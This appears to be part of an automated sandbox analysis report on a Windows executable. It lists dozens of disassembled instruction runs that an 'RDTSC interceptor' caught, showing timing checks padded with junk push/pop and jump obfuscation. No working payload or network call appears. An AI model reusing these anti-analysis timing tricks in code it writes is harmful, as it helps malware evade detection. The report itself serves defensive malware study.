Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12680A1 second address: 12680B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 jns 00007F849CDA41FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B412 second address: 126B418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B418 second address: 126B41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B41C second address: 10F1B76 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849C4F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 7F30098Ah 0x00000013 mov edx, dword ptr [ebp+122D2C60h] 0x00000019 push dword ptr [ebp+122D105Dh] 0x0000001f mov edx, dword ptr [ebp+122D1AFDh] 0x00000025 call dword ptr [ebp+122D2301h] 0x0000002b pushad 0x0000002c stc 0x0000002d cld 0x0000002e xor eax, eax 0x00000030 jmp 00007F849C4F2DA2h 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 sub dword ptr [ebp+122D1BB9h], edx 0x0000003f cld 0x00000040 mov dword ptr [ebp+122D2D3Ch], eax 0x00000046 pushad 0x00000047 jns 00007F849C4F2D96h 0x0000004d movsx eax, si 0x00000050 popad 0x00000051 mov esi, 0000003Ch 0x00000056 jmp 00007F849C4F2D9Ah 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f add dword ptr [ebp+122D1BFFh], edx 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D1BF9h], edi 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007F849C4F2D9Fh 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b mov dword ptr [ebp+122D1988h], ecx 0x00000081 movzx ebx, dx 0x00000084 popad 0x00000085 sub dword ptr [ebp+122D1BB9h], ebx 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f push edx 0x00000090 pop edx 0x00000091 push eax 0x00000092 pop eax 0x00000093 popad 0x00000094 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B49B second address: 126B4C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F849CDA41FFh 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B4C2 second address: 126B4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B4C6 second address: 126B52B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F849CD25978h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jng 00007F849CD25982h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jnl 00007F849CD25976h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 pop edx 0x0000002a popad 0x0000002b pop eax 0x0000002c mov edi, dword ptr [ebp+122D2C60h] 0x00000032 push 00000003h 0x00000034 mov dword ptr [ebp+122D28E2h], edx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D1BF1h], edx 0x00000042 push 00000003h 0x00000044 mov dword ptr [ebp+122D1C6Eh], esi 0x0000004a push DFC3D4F4h 0x0000004f jo 00007F849CD25984h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B52B second address: 126B52F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B58B second address: 126B5D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F849CD25978h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov di, 3C6Eh 0x00000028 adc di, FBABh 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D1AE3h], ebx 0x00000035 call 00007F849CD25979h 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e pop edi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B5D7 second address: 126B6E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F849CD73E58h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F849CD73E64h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b jmp 00007F849CD73E5Bh 0x00000020 jno 00007F849CD73E5Ch 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 pushad 0x0000002a push esi 0x0000002b pushad 0x0000002c popad 0x0000002d pop esi 0x0000002e jno 00007F849CD73E66h 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 pushad 0x0000003a push esi 0x0000003b pushad 0x0000003c popad 0x0000003d pop esi 0x0000003e ja 00007F849CD73E5Ch 0x00000044 popad 0x00000045 pop eax 0x00000046 movzx edx, dx 0x00000049 push 00000003h 0x0000004b call 00007F849CD73E65h 0x00000050 je 00007F849CD73E5Ch 0x00000056 mov dword ptr [ebp+122D2A34h], edi 0x0000005c pop edx 0x0000005d and edi, dword ptr [ebp+122D2D60h] 0x00000063 push 00000000h 0x00000065 call 00007F849CD73E64h 0x0000006a mov dword ptr [ebp+122D17F2h], edi 0x00000070 pop esi 0x00000071 push 00000003h 0x00000073 and ecx, 65F7D520h 0x00000079 call 00007F849CD73E59h 0x0000007e jnc 00007F849CD73E6Bh 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F849CD73E5Eh 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B6E7 second address: 126B6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289FBB second address: 1289FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CD73E5Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F849CD73E56h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289FD7 second address: 1289FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CD25983h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A3D9 second address: 128A3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A3E2 second address: 128A3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A7BD second address: 128A7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A7C3 second address: 128A7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F849CD25976h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A7D4 second address: 128A7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CD73E5Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A7E4 second address: 128A7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A7E8 second address: 128A7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A7EC second address: 128A801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F849CD2597Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A801 second address: 128A83F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E63h 0x00000007 jmp 00007F849CD73E66h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F849CD73E56h 0x00000019 js 00007F849CD73E56h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A83F second address: 128A848 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F099 second address: 127F09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F09D second address: 127F0D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD25980h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F849CD25976h 0x00000013 jmp 00007F849CD25985h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F0D0 second address: 127F0E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CD73E56h 0x00000008 jne 00007F849CD73E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F0E5 second address: 127F0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F849CD25980h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1255E9A second address: 1255EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1255EA0 second address: 1255EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1255EA6 second address: 1255EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F849CD73E66h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1255EC5 second address: 1255EDB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F849CD25976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F849CD25976h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1255EDB second address: 1255EF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F849CD73E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007F849CD73E56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1255EF0 second address: 1255EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F849CD25976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128B54E second address: 128B554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128B554 second address: 128B560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F849CD25978h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128B7F1 second address: 128B833 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F849CD73E6Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F849CD73E60h 0x00000012 jmp 00007F849CD73E5Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128B833 second address: 128B85B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CD25980h 0x00000008 jmp 00007F849CD25983h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128BC77 second address: 128BC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F849CD73E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128BC81 second address: 128BC89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128BC89 second address: 128BCA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1290D59 second address: 1290D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jo 00007F849CD25994h 0x0000000c jc 00007F849CD2597Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1290D6D second address: 1290D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1290D78 second address: 1290D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1292355 second address: 1292359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E365 second address: 125E36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E36F second address: 125E373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E373 second address: 125E37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1297DEF second address: 1297DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129823E second address: 1298272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD25981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F849CD25978h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 jmp 00007F849CD2597Eh 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129851A second address: 129851E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129851E second address: 129853C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F849CD25984h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12986A0 second address: 12986A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12986A4 second address: 12986B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD2597Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12987DF second address: 12987E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12987E5 second address: 12987FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F849CD2597Bh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129A82E second address: 129A849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F849CD73E60h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129AD83 second address: 129AD89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129AD89 second address: 129AD8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B5CA second address: 129B5E7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849CD25976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F849CD25981h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B6B8 second address: 129B6D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B77F second address: 129B784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B8D9 second address: 129B8E3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F849CD73E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B8E3 second address: 129B8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129BC56 second address: 129BC6D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F849CD73E58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F849CD73E56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129BC6D second address: 129BC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129BC73 second address: 129BCA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+1244C794h] 0x00000011 xchg eax, ebx 0x00000012 push edx 0x00000013 jmp 00007F849CD73E60h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jnl 00007F849CD73E56h 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129BCA4 second address: 129BCB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CD2597Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129D0D1 second address: 129D0E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F849CD73E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129D0E3 second address: 129D0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129D70B second address: 129D75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F849CD73E65h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D2EAAh], edx 0x00000014 push edi 0x00000015 call 00007F849CD73E5Ah 0x0000001a mov dword ptr [ebp+122D1AE3h], ebx 0x00000020 pop edi 0x00000021 pop edi 0x00000022 push 00000000h 0x00000024 and esi, dword ptr [ebp+122D2E8Ch] 0x0000002a push 00000000h 0x0000002c xor dword ptr [ebp+1244C7C7h], edi 0x00000032 xchg eax, ebx 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 js 00007F849CD73E56h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129D75C second address: 129D760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129D760 second address: 129D771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 jo 00007F849CD73E5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129E1F5 second address: 129E23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+1244C7C2h], edx 0x0000000f push 00000000h 0x00000011 add esi, 7A52F5A3h 0x00000017 push 00000000h 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jmp 00007F849CD25983h 0x00000020 jg 00007F849CD25978h 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a je 00007F849CD25980h 0x00000030 jmp 00007F849CD2597Ah 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129FA60 second address: 129FA64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A0792 second address: 12A0796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A0796 second address: 12A07A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A07A2 second address: 12A07B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CD2597Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A11B3 second address: 12A11B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A0F99 second address: 12A0FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F849CD25982h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
